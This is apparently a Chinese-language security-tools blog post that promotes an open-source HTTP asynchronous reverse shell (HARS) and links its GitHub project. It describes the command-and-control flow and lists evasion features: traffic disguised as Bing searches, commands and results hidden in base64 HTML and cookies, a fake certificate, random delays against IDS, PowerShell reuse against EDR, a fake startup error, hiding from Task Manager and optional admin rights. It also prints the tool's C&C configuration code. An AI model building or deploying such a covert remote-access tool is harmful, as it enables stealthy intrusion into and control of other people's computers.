使用HTTP协议的异步反向Shell/反弹Shell
- 发表于
- 安全工具
HTTP异步反向Shell
有很多方法可以创建反向shell,以便能够通过防火墙远程控制计算机。确实,传出连接并不总是被过滤。
但是,安全软件和硬件(IPS,IDS,Proxy,AV,EDR等)功能越来越强大,可以检测到这些攻击。在大多数情况下,通过TCP或UDP隧道建立与反向Shell的连接。我认为最好的检测方法是使它看起来像合法流量。HTTP协议是标准用户最常使用的协议。而且,它几乎从未被过滤,以免阻止访问网站。
怎么运行的 ?
- 客户端应用程序在目标计算机上执行。
- 客户端启动与服务器的连接。
- 服务器接受连接。
然后:
- 客户端查询服务器,直到获得指示。
- 攻击者向服务器提供指令。
- 定义命令后,客户端将执行该命令并返回结果。
依此类推,直到攻击者决定结束会话为止。
特征
实现了以下功能:
- 伪造的HTTP流量显示为在bing.com上的搜索。
- 命令在HTML响应中以base64编码。
- 客户端将命令的结果编码为base64中的cookie。
- [可选] SSL支持;默认情况下,它是伪造的bing.com证书。
- 每个客户端调用之间的随机延迟,以避免触发IDS。
- 服务器的每个响应都使用随机模板。
- 重新使用相同的Powershell流程,以避免触发EDR。
- 支持所有Cmd和Powershell命令。
- [可选]客户端可以在启动时显示伪造的错误消息。
- 客户端从任务管理器中隐藏。
- [可选]客户端可以管理员身份运行。
使用示例
有一些配置参数可以在HARS.sln中的Config.cs修改。
class Config
{
/* Behavior */
// Display a fake error msg at startup
public static bool DisplayErrorMsg = true;
// Title of fake error msg
public static string ErrorMsgTitle = "This application could not be started.";
// Description of fake error msg
public static string ErrorMsgDesc = "Unhandled exception has occured in your application. \r\r Object {0} is not valid.";
// Min delay between the client calls
public static int MinDelay = 2;
// Max delay between the client calls
public static int MaxDelay = 5;
// Fake uri requested - Warning : it must begin with "search" (or need a change on server side)
public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";
/* Listener */
// Hostname/IP of C&C server
public static string Server = "https://127.0.0.1";
// Listening port of C&C server
public static string Port = "443";
// Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy
public static bool AllowInsecureCertificate = true;
}
更多文档直接看项目说明。
项目地址:https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell
原文连接:使用HTTP协议的异步反向Shell/反弹Shell
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。